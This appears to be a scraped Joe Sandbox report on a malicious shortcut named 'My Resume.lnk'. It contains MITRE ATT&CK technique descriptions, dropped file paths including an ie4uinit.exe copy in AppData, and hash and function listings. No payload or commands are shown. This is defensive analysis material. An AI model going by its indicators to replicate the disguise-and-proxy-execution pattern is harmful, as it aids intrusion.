HeapFree.KERNEL32(?,?,00000000,00007FF6B522248E,?,?,00000001,00007FF6B52222F4), ref: 00007FF6B52224F6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 13eddbd5d7e76980eb5689528629ee65ca047da04dabec2f077729e54e44d49a
Instruction ID: a2d7fc32c725a22f9d045fd0cb913dfc9f2861f208815dd564c75b45b978bab9
Opcode Fuzzy Hash: 13eddbd5d7e76980eb5689528629ee65ca047da04dabec2f077729e54e44d49a
Instruction Fuzzy Hash: DEF04425A1AA9285E724DB5ABF440A9B764EF88FD0F188034DF4D53B1EDE3DE9468700

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report My Resume.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

C:\Users\user\Favorites\Bing.url

C:\Windows\Temp\OLD4428.tmp

C:\Windows\security\logs\scecomp.log

\Device\ConDrv

\Device\Null

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
My Resume.lnk

Function 00007FF6B5211B44 Relevance: 91.3, APIs: 9, Strings: 43, Instructions: 275
registryCOMMON

Function 00007FF6B52120E4 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 228
registrylibraryloaderCOMMON

Function 00007FF6B5212DFC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 225
commemorysynchronizationCOMMON

Function 00007FF6B521B0DC Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122
COMMON

Function 00007FF6B5212930 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
processCOMMON

Function 00007FF6B521A568 Relevance: 16.7, APIs: 11, Instructions: 190
fileCOMMON

Function 00007FF6B521B2C4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
libraryloaderCOMMON

Function 00007FF6B521A854 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 248
memoryCOMMON

Function 00007FF6B52118B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 113
libraryloaderCOMMON

Function 00007FF6B52116CC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 102
registryCOMMON

Function 00007FF6B5211A70 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 52
registrymemorylibraryCOMMON

Function 00007FF6B521A2F4 Relevance: 16.6, APIs: 11, Instructions: 138
fileCOMMON

Function 00007FF6B52157F0 Relevance: 16.6, APIs: 11, Instructions: 92
filewindowCOMMON

Function 00007FF6B523363C Relevance: 10.6, APIs: 7, Instructions: 143
sleepCOMMON

Function 00007FF6B521B35C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51
libraryloaderCOMMON